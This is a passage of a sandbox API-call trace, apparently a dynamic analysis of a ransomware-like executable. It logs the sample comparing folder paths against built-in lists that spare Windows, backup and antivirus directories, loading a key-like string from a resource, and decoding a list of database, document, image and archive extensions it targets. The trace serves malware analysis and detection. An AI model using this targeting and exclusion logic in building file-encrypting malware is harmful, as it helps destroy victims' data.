CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SYMANTEC ENDPOINT", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TREND MICRO", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BITDEFENDER", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PANDA SECURITY", cchCount1=15, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MCAFEE", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\KASPERSKY LAB", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\KASPERSKYLAB", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\AVDEFENDER", cchCount1=11, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SOPHOS", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\AVG", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 2 [0090.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS\\", cchCount1=9, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS.OLD\\", cchCount1=13, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS10UPGRADE\\", cchCount1=18, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\$RECYCLE.BIN\\", cchCount1=14, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS NT\\", cchCount1=12, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\COMMON FILES\\", cchCount1=14, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", cchCount1=6, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ACRONIS\\", cchCount1=9, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BACKUPCLIENT\\", cchCount1=14, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BACKUP MANAGER\\", cchCount1=16, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\CARBONITE\\", cchCount1=11, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\INTERNET EXPLORER\\", cchCount1=19, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWSPOWERSHELL\\", cchCount1=19, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS DEFENDER\\", cchCount1=18, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DVD MAKER\\", cchCount1=11, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ASPNET_CLIENT\\", cchCount1=15, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\REFERENCE ASSEMBLIES\\", cchCount1=22, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT OFFICE\\", cchCount1=18, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS SIDEBAR\\", cchCount1=17, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS MEDIA PLAYER\\", cchCount1=22, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT\\OFFICE\\", cchCount1=18, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT ONEDRIVE\\", cchCount1=20, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GOOGLE\\DRIVE\\", cchCount1=14, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DROPBOX\\", cchCount1=9, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT\\PROVISIONING\\", cchCount1=24, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT SILVERLIGHT\\", cchCount1=23, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\MICROSOFT\\", cchCount1=23, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT\\CRYPTO\\", cchCount1=18, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWSAPPS\\", cchCount1=13, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ACROBAT READER", cchCount1=15, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\NVIDIA", cchCount1=7, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\7-ZIP\\", cchCount1=7, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINRAR\\", cchCount1=8, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ESET", cchCount1=5, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\AVAST", cchCount1=6, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MALWAREBYTES", cchCount1=13, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SYMANTEC ENDPOINT", cchCount1=18, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TREND MICRO", cchCount1=12, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BITDEFENDER", cchCount1=12, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PANDA SECURITY", cchCount1=15, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MCAFEE", cchCount1=7, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\KASPERSKY LAB", cchCount1=14, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\KASPERSKYLAB", cchCount1=13, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\AVDEFENDER", cchCount1=11, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SOPHOS", cchCount1=7, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\AVG", cchCount1=4, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_END]", cchCount1=8, lpString2="[FEX_START]", cchCount2=11) returned 3 [0090.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[FEX_START]", cchCount1=11, lpString2="[FEX_START]", cchCount2=11) returned 2 [0090.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS\\", cchCount1=9, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS.OLD\\", cchCount1=13, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS10UPGRADE\\", cchCount1=18, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\$RECYCLE.BIN\\", cchCount1=14, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS NT\\", cchCount1=12, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\COMMON FILES\\", cchCount1=14, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", cchCount1=6, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ACRONIS\\", cchCount1=9, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BACKUPCLIENT\\", cchCount1=14, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BACKUP MANAGER\\", cchCount1=16, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\CARBONITE\\", cchCount1=11, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\INTERNET EXPLORER\\", cchCount1=19, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWSPOWERSHELL\\", cchCount1=19, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS DEFENDER\\", cchCount1=18, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DVD MAKER\\", cchCount1=11, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ASPNET_CLIENT\\", cchCount1=15, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\REFERENCE ASSEMBLIES\\", cchCount1=22, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT OFFICE\\", cchCount1=18, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS SIDEBAR\\", cchCount1=17, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS MEDIA PLAYER\\", cchCount1=22, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT\\OFFICE\\", cchCount1=18, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT ONEDRIVE\\", cchCount1=20, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GOOGLE\\DRIVE\\", cchCount1=14, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DROPBOX\\", cchCount1=9, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT\\PROVISIONING\\", cchCount1=24, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT SILVERLIGHT\\", cchCount1=23, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\MICROSOFT\\", cchCount1=23, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT\\CRYPTO\\", cchCount1=18, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWSAPPS\\", cchCount1=13, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ACROBAT READER", cchCount1=15, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\NVIDIA", cchCount1=7, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\7-ZIP\\", cchCount1=7, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINRAR\\", cchCount1=8, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ESET", cchCount1=5, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\AVAST", cchCount1=6, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MALWAREBYTES", cchCount1=13, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SYMANTEC ENDPOINT", cchCount1=18, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TREND MICRO", cchCount1=12, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BITDEFENDER", cchCount1=12, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PANDA SECURITY", cchCount1=15, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MCAFEE", cchCount1=7, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\KASPERSKY LAB", cchCount1=14, lpString2="[FEX_END]", cchCount2=9) returned 3 [0090.718] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19f9a8, nSize=0x105 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\current_dirnwovkcyl.exe")) returned 0x35 [0090.718] GetCurrentThreadId () returned 0x360 [0090.718] GetCurrentThreadId () returned 0x360 [0090.718] GetCurrentThreadId () returned 0x360 [0090.718] FindResourceW (hModule=0x400000, lpName="PRL", lpType=0xa) returned 0x4f54b0 [0090.718] LoadResource (hModule=0x400000, hResInfo=0x4f54b0) returned 0x526a20 [0090.719] SizeofResource (hModule=0x400000, hResInfo=0x4f54b0) returned 0x148 [0090.719] LockResource (hResData=0x526a20) returned 0x526a20 [0090.719] FreeResource (hResData=0x526a20) returned 0 [0090.719] FindResourceW (hModule=0x400000, lpName="KN", lpType=0xa) returned 0x4f5450 [0090.719] LoadResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x525e94 [0090.719] SizeofResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x26 [0090.719] LockResource (hResData=0x525e94) returned 0x525e94 [0090.719] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fe52a8, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0090.719] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fe52a8, cbMultiByte=38, lpWideCharStr=0x1fde20c, cchWideChar=38 | out: lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N\r\n42\r\n") returned 38 [0090.719] FreeResource (hResData=0x525e94) returned 0 [0090.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0090.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", cchWideChar=32, lpMultiByteStr=0x1fe52ac, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", lpUsedDefaultChar=0x0) returned 32 [0090.719] GetCurrentThreadId () returned 0x360 [0090.719] GetCurrentThreadId () returned 0x360 [0090.719] GetCurrentThreadId () returned 0x360 [0090.719] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1f41108, cbMultiByte=328, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 328 [0090.719] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1f41108, cbMultiByte=328, lpWideCharStr=0x1f3afac, cchWideChar=328 | out: lpWideCharStr="MDF\r\nNDF\r\nLDF\r\nMYD\r\nEQL\r\nSQL\r\nVHD\r\nSQLITE\r\nSQLITE3\r\nSQLITEDB\r\nHWP\r\nHWT\r\nHML\r\nHWDT\r\nHWPX\r\nCELL\r\nNXL\r\nHCDT\r\nNXT\r\nSHOW\r\nHPT\r\nHSDT\r\nXLSX\r\nXLS\r\nDOCX\r\nDOC\r\nDOT\r\nDOTX\r\nODT\r\nODS\r\nBAK\r\nTIB\r\nDBS\r\nDB\r\nDBK\r\nDB2\r\nDB3\r\nDBC\r\nDT\r\nDBS\r\nDBF\r\nDBX\r\nMDB\r\nSDF\r\nNDF\r\nNS2\r\nNS3\r\nNS4\r\nNSF\r\nACCDB\r\nVPD\r\nDWG\r\nCDR\r\nPDF\r\nJPG\r\nJPEG\r\nPSD\r\nZIP\r\nRAR\r\n7Z\r\nTAR\r\nGZ") returned 328 [0090.719] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe\" " [0090.719] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe\" " [0090.719] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe\" " [0090.719] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe\" " [0090.720] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe\" " [0090.720] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19f76c, nSize=0x105 | out: 